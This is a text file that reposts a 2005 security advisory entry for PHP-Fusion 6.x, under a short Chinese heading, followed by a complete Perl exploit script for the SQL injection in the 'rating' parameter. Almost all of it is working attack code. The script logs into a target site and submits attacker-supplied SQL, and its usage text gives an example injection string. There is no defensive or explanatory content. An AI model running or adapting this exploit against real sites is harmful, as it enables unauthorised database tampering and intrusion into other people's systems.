23122005.txt

一些可以实现益出的程序

PHP-Fusion 6.x "rating" Parameter Handling Remote SQL Injection Exploit
Date : 23/12/2005
 

 

Advisory ID : FrSIRT/ADV-2005-3063
Rated as : Moderate Risk 

#!/usr/bin/perl
#Exploit for PHP-Fusion 6.00.3 Released
#Coded by:krasza[krasza@gmail.com]
#Greetz: http://www.securityreason.com
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
if(!$ARGV[3]){
print<<EOF;
Exploit for PHP-Fusion 6.00.3 Released
Coded by krasza
Contact me:krasza\@gmail.com
Greets:
-http://www.securityreason.com
-http://www.revival.pl
-mulander

Usage:
perl phpfusion.pl url login pass sql
url-url hack site with [php fusion's directory]
login-your login
pass-your password
sql-[sql code]
Example:
\t perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
EOF
exit;
}
my $url=shift;
my $login=shift;
my $haslo=shift;
my $sql=shift;
$url=$url."/news.php?readmore=1";
my $ua = new LWP::UserAgent;
$ua->agent("Exploit for PHP-Fusion" . $ua->agent);
$ua->cookie_jar( HTTP::Cookies->new('file' => 'ciasteczka.txt','autosave' => 1,));
print "[+]Connecting to $url...\n";

my $zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj');
my $wynik = $ua->request($zadanie);
if ($wynik->is_success){
print "[+]Connected to $url\n";
#LOGIN JEST PRAWIDLOWE
}else{
print "[-]Connected failed to $url\n";
print "[-]Error:".$wynik->message."\n";
exit;
}
print "[+] Logging In $url...\n";
$zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%EA');
my $wynik2 = $ua->request($zadanie);
if ($wynik2->is_success){
print "[+] Sql query isn't done!\n";
}else{
print "[-]Sql query is done\n";
}